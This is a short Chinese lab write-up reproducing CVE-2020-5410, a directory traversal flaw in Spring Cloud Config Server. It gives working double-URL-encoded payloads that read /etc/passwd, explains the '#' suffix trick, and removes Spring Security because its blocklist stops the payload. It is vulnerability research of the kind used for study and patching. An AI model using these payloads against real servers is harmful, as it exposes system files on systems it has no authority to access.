用之前的環境即可:
https://github.com/shadowsock5/spring-cloud-config-starter
PoC參考:
- https://github.com/osamahamad/CVE-2020-5410-POC
- https://github.com/threedr3am/learnjavabug/blob/a13aad49c93c05e6fb9db7668a9de6b0b1106307/spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java
- CVE-2020-5410 Spring Cloud Config目錄穿越漏洞
127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
利用核心:使用#去註釋掉springboot自動拼接的配置文件後綴
但是發現使用之前的環境是帶着Spring Security的,由於payload中含有%25
,命中其黑名單被攔截:
參考threedr3am大佬的:
https://github.com/threedr3am/learnjavabug/blob/master/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml
去掉這部分:
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
<version>2.2.2.RELEASE</version>
</dependency>
再重新啓動。
PoC:
payload = "222.txt"
url = "/..%252F..%252F..%252F..%252F..%252F{0}%23/222/11".format(payload)
native的目錄在:
/home/77/repos/spring-cloud-config-starter/config-repo
Payload爲:
/..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23111/222
影響範圍
Spring Cloud Config
2.2.0 to 2.2.2
2.1.0 to 2.1.8